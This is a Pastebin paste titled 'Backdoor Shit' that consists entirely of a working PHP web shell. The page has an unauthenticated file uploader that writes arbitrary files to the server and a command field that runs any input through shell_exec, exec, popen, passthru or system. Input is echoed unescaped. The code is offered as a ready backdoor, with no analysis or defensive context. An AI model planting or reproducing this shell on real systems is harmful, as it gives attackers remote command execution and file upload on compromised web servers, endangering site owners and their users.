willysec_id

Backdoor Shit

Oct 10th, 2022
375
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.16 KB | Cybersecurity | 0 0
  1.    
  2. <!DOCTYPE html>
  3. <html lang="en">
  4. <head>
  5.     <meta charset="UTF-8">
  6.     <meta http-equiv="X-UA-Compatible" content="IE=edge">
  7.     <meta name="viewport" content="width=device-width, initial-scale=1.0">
  8.     <title>File Uploader</title>
  9. </head>
  10. <body>
  11.     <span style="display:none">Vuln!!</span>
  12.     <form method="post" enctype="multipart/form-data">
  13.         <strong>Select a file to upload :</strong> <input type="file" name="upload" />
  14.         <br /><br/>
  15.         <button type="submit" name="upload_btn" style="border:none;background:#000;color:#fff;padding:5px 10px;font-weight:bold;height:50px;cursor:pointer;">Upload the fucking shit</button>
  16.         <br /> <br/>
  17.     </form>
  18.     <form method="post">
  19.         <strong>Run Command (Komut Çalıştır): </strong><input type="text" name="cmd" placeholder="whoami" value="<?=$_POST['cmd'];?>" style="width:400px;border:1px solid #efefef;padding:5px 10px;height:40px" />
  20.         <br /><br />
  21.         <button type="submit" name="run_cmd" style="border:none;background:#000;color:#fff;padding:5px 10px;font-weight:bold;height:50px;cursor:pointer;">Run command</button>
  22.         <br/><br/>
  23.     </form>
  24. </body>
  25. </html>
  26. <?php
  27.     if(isset($_POST["upload_btn"])){
  28.         if(@move_uploaded_file($_FILES["upload"]["tmp_name"],$_FILES["upload"]["name"])){
  29.             print "File is uploaded,check it: <a href=\"{$_FILES["upload"]["name"]}\">{$_FILES["upload"]["name"]}</a>";
  30.         }else{
  31.             print "Can not upload the file!";
  32.         }
  33.     }elseif(isset($_POST["run_cmd"])){
  34.  
  35.         $cmd = $_POST["cmd"];
  36.  
  37.         if(function_exists("shell_exec")){
  38.             $run = shell_exec($cmd);
  39.             echo "<font color=\"red\">Kullanılan işlev : shell_exec() </font>, <strong>Gönderilen Komut : $cmd</strong><br /><pre>$run</pre>";
  40.         }elseif(function_exists("exec")){
  41.             $run = exec($cmd,$result);
  42.             echo "<font color=\"red\">Kullanılan işlev : exec() </font>, <strong>Gönderilen Komut : $cmd</strong><br />";
  43.             foreach($result as $res){
  44.                 $res = trim($res);
  45.                 echo "<strong>exec-> $res</strong><br />";
  46.             }
  47.         }elseif(function_exists("popen")){
  48.             $run = popen($cmd,"r");
  49.             $result = "";
  50.             echo "<font color=\"red\">Kullanılan işlev : popen() </font>, <strong>Gönderilen Komut : $cmd</strong><br /><br/>";
  51.             while(!feof($run)){
  52.                 $buffer = fgets($run,4096);
  53.                 $result .= "<strong>popen -> $buffer</strong><br />";
  54.             }
  55.             pclose($run);
  56.             echo $result;
  57.         }elseif(function_exists("passthru")){
  58.             passthru($cmd);
  59.             echo "<br /><br /><br /><font color=\"red\">Kullanılan işlev : passthru() </font>, <strong>Gönderilen Komut : $cmd</strong><br />";
  60.         }elseif(function_exists("system")){
  61.             system($cmd);
  62.             echo "<br /><br /><br /><font color=\"red\">Kullanılan işlev : system() </font>, <strong>Gönderilen Komut : $cmd</strong><br />";
  63.         }else{
  64.             print "passthru(),shell_exec(),exec(),popen(),system() functions are disabled / Aktif değil!";
  65.         }
  66.  
  67.     }
  68. ?>
Add Comment
Please, Sign In to add comment